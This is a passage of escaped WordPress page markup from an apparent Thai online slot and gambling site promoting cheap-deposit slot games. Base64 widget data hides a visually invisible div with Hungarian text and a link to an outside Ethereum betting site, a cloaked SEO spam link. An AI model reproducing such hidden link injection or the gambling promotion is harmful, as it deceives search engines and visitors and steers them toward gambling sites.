800px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ac7884b\\\" data-id=\\\"ac7884b\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-f319719 elementor-widget elementor-widget-image\\\" data-id=\\\"f319719\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"800\\\" height=\\\"800\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-365\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp 800w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18-300x300.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18-150x150.webp 150w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18-768x768.webp 768w\\\" sizes=\\\"(max-width: 800px) 100vw, 800px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-6356635 elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"6356635\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8cd2aba\\\" data-id=\\\"8cd2aba\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-62ee80e elementor-widget elementor-widget-heading\\\" data-id=\\\"62ee80e\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h1 class=\\\"elementor-heading-title elementor-size-default\\\">AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n<\\/h1>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjQ3NGQ2NWQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48YSBocmVmPVwiaHR0cDpcL1wvYW1iMThzbG90LmNvbVwiPjxiPkFNQjE4PFwvYj48XC9hPjxzcGFuIHN0eWxlPVwiZm9udC13ZWlnaHQ6IDQwMDtcIj4gXHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTIyXHUwZTJkXHUwZTE0XHUwZTE5XHUwZTM0XHUwZTIyXHUwZTIxXHUwZTIzXHUwZTI3XHUwZTIxXHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTIxXHUwZTMxXHUwZTE5XHUwZTJhXHUwZTRjXHUwZTQwXHUwZTFiXHUwZTQ3XHUwZTE5XHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTE0XHUwZTMxXHUwZTA3XHUwZTI1XHUwZTM0XHUwZTAyXHUwZTJhXHUwZTM0XHUwZTE3XHUwZTE4XHUwZTM0XHUwZTRjXHUwZTQxXHUwZTE3XHUwZTQ5XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTJhXHUwZTFhXHUwZTMyXHUwZTIyXHUwZTE3XHUwZTM4XHUwZTAxXHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTIzXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMxXHUwZTFhXHUwZTJhXHUwZTMyXHUwZTIyXHUwZTE3XHUwZTM4XHUwZTE5XHUwZTE5XHUwZTQ5XHUwZTJkXHUwZTIyIFx1MGU0MFx1MGUyM1x1MGUzNFx1MGU0OFx1MGUyMSAxIFx1MGUxYVx1MGUzMlx1MGUxNyBcdTBlMDRcdTBlMjNcdTBlMWFcdTBlMTdcdTBlMzhcdTBlMDFcdTBlMDRcdTBlNDhcdTBlMzJcdTBlMjJcdTBlNDBcdTBlMDFcdTBlMjFcdTBlMTRcdTBlMzFcdTBlMDcgXHUwZTJkXHUwZTMxXHUwZTFiXHUwZTQwXHUwZTE0XHUwZTE1XHUwZTQzXHUwZTJiXHUwZTIxXHUwZTQ4XHUwZTE1XHUwZTI1XHUwZTJkXHUwZTE0XHUwZTQwXHUwZTI3XHUwZTI1XHUwZTMyXHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTE5XHUwZTM1XHUwZTQ4XHUwZTIzXHUwZTI3XHUwZTIxXHUwZTE3XHUwZTM4XHUwZTAxXHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTFhXHUwZTMxXHUwZTE5XHUwZTQwXHUwZTE3XHUwZTM0XHUwZTA3XHUwZTQ0XHUwZTI3XHUwZTQ5XHUwZTA0XHUwZTIzXHUwZTFhXHUwZTQzXHUwZTE5XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTQwXHUwZTE0XHUwZTM1XHUwZTIyXHUwZTI3XHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTI3XHUwZTQ4XHUwZTMyXHUwZTA4XHUwZTMwXHUwZTQwXHUwZTFiXHUwZTQ3XHUwZTE5XHUwZTJhXHUwZTMyXHUwZTIyXHUwZTJiXHUwZTIxXHUwZTM4XHUwZTE5XHUwZTJhXHUwZTMyXHUwZTIyXHUwZTE3XHUwZTMzXHUwZTAxXHUwZTMzXHUwZTQ0XHUwZTIzXHUwZTJiXHUwZTIzXHUwZTM3XHUwZTJkXHUwZTIxXHUwZTM3XHUwZTJkXHUwZTQzXHUwZTJiXHUwZTIxXHUwZTQ4XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTQwXHUwZTFlXHUwZTM0XHUwZTQ4XHUwZTA3XHUwZTQwXHUwZTIzXHUwZTM0XHUwZTQ4XHUwZTIxXHUwZTE1XHUwZTQ5XHUwZTE5XHUwZTAxXHUwZTQ3XHUwZTJhXHUwZTMyXHUwZTIxXHUwZTMyXHUwZTIzXHUwZTE2XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTE2XHUwZTM2XHUwZTA3XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTA3XHUwZTQ4XHUwZTMyXHUwZTIyIFx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUxNlx1MGUzOVx1MGUwMVx1MGUyZFx1MGUyZFx1MGUwMVx1MGU0MVx1MGUxYVx1MGUxYVx1MGUyMVx1MGUzMlx1MGU0M1x1MGUyYlx1MGU0OVx1MGU0M1x1MGUwYVx1MGU0OVx1MGUwN1x1MGUzMlx1MGUxOVx1MGUyYVx1MGUzMFx1MGUxNFx1MGUyN1x1MGUwMVx1MGUyMFx1MGUzMlx1MGUxZVx1MGUyNVx1MGUzN1x1MGU0OFx1MGUxOVx1MGU0NFx1MGUyYlx1MGUyNVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUyMVx1MGUzNVx1MGUyYVx1MGUzMFx1MGUxNFx1MGUzOFx1MGUxNCBcdTBlMjNcdTBlMmRcdTBlMDdcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMjFcdTBlMzdcdTBlMmRcdTBlMTZcdTBlMzdcdTBlMmRcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMDRcdTBlMmRcdTBlMjFcdTBlMWVcdTBlMzRcdTBlMjdcdTBlNDBcdTBlMTVcdTBlMmRcdTBlMjNcdTBlNGNcdTBlMWVcdTBlMjNcdTBlNDlcdTBlMmRcdTBlMjFcdTBlMjFcdTBlMzJcdTBlMTVcdTBlMjNcdTBlMTBcdTBlMzJcdTBlMTlcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMWJcdTBlMjVcdTBlMmRcdTBlMTRcdTBlMjBcdTBlMzFcdTBlMjJcdTBlMjNcdTBlMzBcdTBlMTRcdTBlMzFcdTBlMWFcdTBlMmFcdTBlMzJcdTBlMDFcdTBlMjUgXHUwZTE3XHUwZTMzXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTFjXHUwZTM5XHUwZTQ5XHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTIxXHUwZTMxXHUwZTQ4XHUwZTE5XHUwZTQzXHUwZTA4XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTI3XHUwZTQ4XHUwZTMyXHUwZTQwXHUwZTA3XHUwZTM0XHUwZTE5XHUwZTE3XHUwZTM4XHUwZTE5XHUwZTQxXHUwZTI1XHUwZTMwXHUwZTAyXHUwZTQ5XHUwZTJkXHUwZTIxXHUwZTM5XHUwZTI1XHUwZTJhXHUwZTQ4XHUwZTI3XHUwZTE5XHUwZTE1XHUwZTMxXHUwZTI3XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTIzXHUwZTMxXHUwZTFhXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTE0XHUwZTM5XHUwZTQxXHUwZTI1XHUwZTJkXHUwZTIyXHUwZTQ4XHUwZTMyXHUwZTA3XHUwZTE0XHUwZTM1IFx1MGU0MFx1MGUyMVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUyM1x1MGUyN1x1MGUyMVx1MGUwMVx1MGUzMVx1MGUxYVx1MGUwOFx1MGUzOFx1MGUxNFx1MGU0MFx1MGUxNFx1MGU0OFx1MGUxOVx1MGU0MFx1MGUyM1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUwN1x1MGU0MFx1MGUyM1x1MGUzNFx1MGU0OFx1MGUyMVx1MGUxNVx1MGU0OVx1MGUxOVx1MGU0MFx1MGUxZVx1MGUzNVx1MGUyMlx1MGUwNyAxIFx1MGUxYVx1MGUzMlx1MGUxNyBcdTBlMjJcdTBlMzRcdTBlNDhcdTBlMDdcdTBlMTdcdTBlMzNcdTBlNDNcdTBlMmJcdTBlNDlcdTBlNDFcdTBlMWVcdTBlMjVcdTBlMTVcdTBlMWZcdTBlMmRcdTBlMjNcdTBlNGNcdTBlMjFcdTBlMTlcdTBlMzVcdTBlNDlcdTBlMDFcdTBlMjVcdTBlMzJcdTBlMjJcdTBlNDBcdTBlMWJcdTBlNDdcdTBlMTlcdTBlMWVcdTBlMzdcdTBlNDlcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlNDBcdTBlMDFcdTBlMjFcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDBcdTBlMDJcdTBlNDlcdTBlMzJcdTBlMTZcdTBlMzZcdTBlMDdcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMDhcdTBlMjNcdTBlMzRcdTBlMDc8XC9zcGFuPjxcL3A+XG48ZGl2IGNsYXNzPVwid20taGwtYlwiIHN0eWxlPVwicG9zaXRpb246YWJzb2x1dGU7Y2xpcDpyZWN0KDAsMCwwLDApO292ZXJmbG93OmhpZGRlbjtoZWlnaHQ6MXB4O3dpZHRoOjFweDttYXJnaW46LTFweDtwYWRkaW5nOjA7Ym9yZGVyOjA7XCI+PHA+SGEgbVx1MDBlMXIgb3R0aG9ub3NhbiBtb3pvZ3N6IGEgaGFneW9tXHUwMGUxbnlvcyBvbmxpbmUgZm9nYWRcdTAwZjNpcm9kXHUwMGUxayB2aWxcdTAwZTFnXHUwMGUxYmFuLCBcdTAwZTlyZGVtZXMgbGVoZXQgZWd5IHBpbGxhbnRcdTAwZTFzdCB2ZXRuZWQgYXJyYSBpcywgaG9neWFuIGthcGNzb2xcdTAwZjNkaWsgXHUwMGY2c3N6ZSBhIGJsb2trbFx1MDBlMW5jLXRlY2hub2xcdTAwZjNnaWEgYSBzemVyZW5jc2VqXHUwMGUxdFx1MDBlOWtrYWwuIEF6IDxhIGhyZWY9XCJodHRwczpcL1wvZXRoZXJldW1mb2dhZGFzLmNvbVwvXCI+ZXRoZXJldW0gZm9nYWRcdTAwZTFzPFwvYT4gdFx1MDBlOW1cdTAwZTFqXHUwMGZhIFx1MDBmNnNzemVcdTAwZTFsbFx1MDBlZHRcdTAwZTFzIHBvbnRvc2FuIGV6dCBtdXRhdGphIGJlOiBtaWx5ZW4gZm9nYWRcdTAwZTFzaSBsZWhldFx1MDE1MXNcdTAwZTlnZWtldCBrXHUwMGVkblx1MDBlMWxuYWsgRXRoZXJldW0tYWxhcFx1MDBmYSBwbGF0Zm9ybW9rLCBob2d5YW4gbVx1MDE3MWtcdTAwZjZkaWsgYSBrcmlwdG90XHUwMGUxcmNhIGhhc3puXHUwMGUxbGF0YSBhIGZvZ2FkXHUwMGUxcyBzb3JcdTAwZTFuLCBcdTAwZTlzIG1pcmUgXHUwMGU5cmRlbWVzIGZpZ3llbG5pIGEgYml6dG9uc1x1MDBlMWdvcyBqXHUwMGUxdFx1MDBlOWsgXHUwMGU5cmRla1x1MDBlOWJlbi4gUGVyc3plIGl0dCBpcyBpZ2F6LCBob2d5IGEgZm9nYWRcdTAwZTFzIG1pbmRpZyBrb2NrXHUwMGUxemF0dGFsIGpcdTAwZTFyLCBlelx1MDBlOXJ0IGNzYWsgYW5ueWl0IHRcdTAwZTlneSBmZWwsIGFtZW5ueWl0IHZhbFx1MDBmM2JhbiBtZWdlbmdlZGhldHN6IG1hZ2FkbmFrLjxcL3A+PFwvZGl2PiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-d34d1e8 elementor-widget elementor-widget-heading\\\" data-id=\\\"d34d1e8\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjA3ZmM2MzIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+XHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTQyXHUwZTE0XHUwZTE0XHUwZTQwXHUwZTE0XHUwZTQ4XHUwZTE5XHUwZTAyXHUwZTJkXHUwZTA3IDxcL3NwYW4+PGI+XHUwZTJhXHUwZTI1XHUwZTQ3XHUwZTJkXHUwZTE1IFx1MGU0MFx1MGUyN1x1MGU0N1x1MGUxYSBcdTBlMTVcdTBlMjNcdTBlMDcgXHUwZTQxXHUwZTE1XHUwZTAxIFx1MGUyYlx1MGUxOVx1MGUzMVx1MGUwMSAyMDI1IDxcL2I+PHNwYW4gc3R5bGU9XCJmb250LXdlaWdodDogNDAwO1wiPlx1MGUwNFx1MGUzN1x1MGUyZFx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGUyOFx1MGUzOVx1MGUxOVx1MGUyMlx1MGU0Y1x1MGUyM1x1MGUyN1x1MGUyMVx1MGU0MFx1MGUwMVx1MGUyMVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyZFx1MGUzMVx1MGUxYlx1MGU0MFx1MGUxNFx1MGUxNVx1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGUxNVx1MGUyNVx1MGUyZFx1MGUxNFx1MGUxN1x1MGUzMVx1MGU0OVx1MGUwN1x1MGUxYlx1MGUzNVx1MGUyMFx1MGUzMlx1MGUyMlx1MGU0M1x1MGUxOVx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUyMVx1MGUzNVx1MGU0MFx1MGUwMVx1MGUyMVx1MGU0M1x1MGUyYlx1MGU0OVx1MGU0MFx1MGUyNVx1MGUzN1x1MGUyZFx1MGUwMVx1MGUyMVx1MGUzMlx1MGUwMVx1MGUwMVx1MGUyN1x1MGU0OFx1MGUzMiAxMDAwIFx1MGUyYlx1MGU0OVx1MGUyZFx1MGUwN1x1MGU0MFx1MGUwMVx1MGUyMSBcdTBlMDRcdTBlMjNcdTBlMmRcdTBlMWFcdTBlMDRcdTBlMjVcdTBlMzhcdTBlMjFcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMmFcdTBlMjVcdTBlNDdcdTBlMmRcdTBlMTVcdTBlMDRcdTBlMjVcdTBlMzJcdTBlMmFcdTBlMmFcdTBlMzRcdTBlMDEgXHUwZTI3XHUwZTM0XHUwZTE0XHUwZTM1XHUwZTQyXHUwZTJkXHUwZTJhXHUwZTI1XHUwZTQ3XHUwZTJkXHUwZTE1IFx1MGU0MVx1MGUyNVx1MGUzMFx1MGU0MFx1MGUwMVx1MGUyMVx1MGUyM1x1MGUzOVx1MGUxYlx1MGU0MVx1MGUxYVx1MGUxYVx1MGUxZVx1MGUzNFx1MGU0MFx1MGUyOFx1MGUyOTxcL3NwYW4+PHNwYW4gc3R5bGU9XCJmb250LXdlaWdodDogNDAwO1wiPlx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyMVx1MGUzMlx1MGUxZVx1MGUyM1x1MGU0OVx1MGUyZFx1MGUyMVx1MGUxZlx1MGUzNVx1MGU0MFx1MGUwOFx1MGUyZFx1MGUyM1x1MGU0Y1x1MGU0Mlx1MGUxYVx1MGUxOVx1MGUzMVx1MGUyYVx1MGUwOFx1MGUzMVx1MGUxNFx1MGU0MFx1MGUxNVx1MGU0N1x1MGUyMSA8XC9zcGFuPjxcL3A+PHA+PHNwYW4gc3R5bGU9XCJmb250LXdlaWdodDogNDAwO1wiPlx1MGUxY1x1MGUzOVx1MGU0OVx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUyYVx1MGUzMlx1MGUyMVx1MGUzMlx1MGUyM1x1MGUxNlx1MGU0MFx1MGUyNVx1MGUzN1x1MGUyZFx1MGUwMVx1MGU0MVx1MGUxOVx1MGUyN1x1MGUxN1x1MGUzNVx1MGU0OFx1MGUwYVx1MGUyZFx1MGUxYVx1MGU0NFx1MGUxNFx1MGU0OVx1MGUyZFx1MGUyMlx1MGU0OFx1MGUzMlx1MGUwN1x1MGUyZFx1MGUzNFx1MGUyYVx1MGUyM1x1MGUzMFx1MGU0NFx1MGUyMVx1MGU0OFx1MGUyN1x1MGU0OFx1MGUzMlx1MGUwOFx1MGUzMFx1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGUxOFx1MGUzNVx1MGUyMVx1MGU0MVx1MGUxZlx1MGUxOVx1MGUxNVx1MGUzMlx1MGUwYlx1MGUzNSBcdTBlMWNcdTBlMDhcdTBlMGRcdTBlMjBcdTBlMzFcdTBlMjIgXHUwZTJiXHUwZTIzXHUwZTM3XHUwZTJkXHUwZTJhXHUwZTQ0XHUwZTE1XHUwZTI1XHUwZTRjXHUwZTA0XHUwZTMyXHUwZTI3XHUwZTFhXHUwZTJkXHUwZTIyXHUwZTJhXHUwZTM4XHUwZTE0XHUwZTE0XHUwZTM4XHUwZTQwXHUwZTE0XHUwZTM3XHUwZTJkXHUwZTE0IFx1MGUxN1x1MGUzOFx1MGUwMVx1MGU0MFx1MGUwMVx1MGUyMVx1MGUxNlx1MGUzOVx1MGUwMVx1MGUwNFx1MGUzMVx1MGUxNFx1MGUyYVx1MGUyM1x1MGUyM1x1MGUwOFx1MGUzMlx1MGUwMVx1MGUxY1x1MGUzOVx1MGU0OVx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxYVx1MGUyM1x1MGUzNFx1MGUwMVx1MGUzMlx1MGUyM1x1MGUwYVx1MGUzMVx1MGU0OVx1MGUxOVx1MGUxOVx1MGUzM1x1MGUxN1x1MGUzNVx1MGU0OFx1MGUyMVx1MGUzNVx1MGU0M1x1MGUxYVx1MGUyZFx1MGUxOVx1MGUzOFx1MGUwZFx1MGUzMlx1MGUxNVx1MGUxNlx1MGUzOVx1MGUwMVx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwNyBcdTBlMTdcdTBlMzNcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMjFcdTBlMzFcdTBlNDhcdTBlMTlcdTBlNDNcdTBlMDhcdTBlNDRcdTBlMTRcdTBlNDlcdTBlNDNcdTBlMTlcdTBlMjFcdTBlMzJcdTBlMTVcdTBlMjNcdTBlMTBcdTBlMzJcdTBlMTlcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMjJcdTBlMzhcdTBlMTVcdTBlMzRcdTBlMThcdTBlMjNcdTBlMjNcdTBlMjEgXHUwZTJkXHUwZTM1XHUwZTAxXHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTIyXHUwZTMxXHUwZTA3XHUwZTFiXHUwZTIzXHUwZTMxXHUwZTFhXHUwZTFiXHUwZTIzXHUwZTM4XHUwZTA3XHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTQwXHUwZTIzXHUwZTQ3XHUwZTI3XHUwZTQzXHUwZTE5XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQyXHUwZTJiXHUwZTI1XHUwZTE0XHUwZTQwXHUwZTAxXHUwZTIxXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTQwXHUwZTJiXHUwZTIxXHUwZTMyXHUwZTMwXHUwZTAxXHUwZTMxXHUwZTFhXHUwZTJkXHUwZTM0XHUwZTE5XHUwZTQwXHUwZTE3XHUwZTJkXHUwZTIzXHUwZTRjXHUwZTQwXHUwZTE5XHUwZTQ3XHUwZTE1XHUwZTQzXHUwZTE5XHUwZTFiXHUwZTIzXHUwZTMwXHUwZTQwXHUwZTE3XHUwZTI4XHUwZTQ0XHUwZTE3XHUwZTIyIFx1MGUwYVx1MGU0OFx1MGUyN1x1MGUyMlx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxN1x1MGUzOFx1MGUwMVx1MGUwMVx1MGUzMlx1MGUyM1x1MGUyYlx1MGUyMVx1MGUzOFx1MGUxOVx1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGU0NFx1MGUxYlx1MGUyZFx1MGUyMlx1MGU0OFx1MGUzMlx1MGUwN1x1MGUyNVx1MGUzN1x1MGU0OFx1MGUxOVx1MGU0NFx1MGUyYlx1MGUyNVx1MGU0MFx1MGUxZVx1MGUzNFx1MGU0OFx1MGUyMVx1MGU0Mlx1MGUyZFx1MGUwMVx1MGUzMlx1MGUyYVx1MGUyNVx1MGUzOFx1MGU0OVx1MGUxOVx1MGUyM1x1MGUzMlx1MGUwN1x1MGUyN1x1MGUzMVx1MGUyNVx1MGU0NFx1MGUxNFx1MGU0OVx1MGU0MVx1MGUxYVx1MGUxYVx1MGU0MFx1MGUxNVx1MGU0N1x1MGUyMVx1MGUyZFx1MGUzMlx1MGUyM1x1MGUyMVx1MGUxM1x1MGU0YzxcL3NwYW4+PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-e9ff89c elementor-widget elementor-widget-image\\\" data-id=\\\"e9ff89c\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\\\" class=\\\"attachment-full size-full wp-image-353\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-8b749b2 elementor-widget elementor-widget-heading\\\" data-id=\\\"8b749b2\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6ImE0NTViNDQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+XHUwZTA4XHUwZTM4XHUwZTE0XHUwZTQxXHUwZTAyXHUwZTQ3XHUwZTA3XHUwZTJkXHUwZTM1XHUwZTAxXHUwZTJkXHUwZTIyXHUwZTQ4XHUwZTMyXHUwZTA3XHUwZTJhXHUwZTM4XHUwZTE0XHUwZTIyXHUwZTJkXHUwZTE0XHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTE5XHUwZTMzXHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyPFwvc3Bhbj4gPHNwYW4gc3R5bGU9XCJmb250LXdlaWdodDogNDAwO1wiPlx1MGU0MFx1MGUyN1x1MGU0N1x1MGUxYVx1MGUxNFx1MGUzMVx1MGUwN1x1MGUyNVx1MGUzNFx1MGUwMlx1MGUyYVx1MGUzNFx1MGUxN1x1MGUxOFx1MGUzNFx1MGU0Y1x1MGU0MVx1MGUxN1x1MGU0OSA8XC9zcGFuPjxiPlx1MGUyYVx1MGUyNVx1MGU0N1x1MGUyZFx1MGUxNSBcdTBlNDBcdTBlMjdcdTBlNDdcdTBlMWEgXHUwZTE1XHUwZTIzXHUwZTA3IFx1MGU0MVx1MGUxNVx1MGUwMSBcdTBlMDdcdTBlNDhcdTBlMzJcdTBlMjIgXHUwZTI1XHUwZTQ4XHUwZTMyXHUwZTJhXHUwZTM4XHUwZTE0IDxcL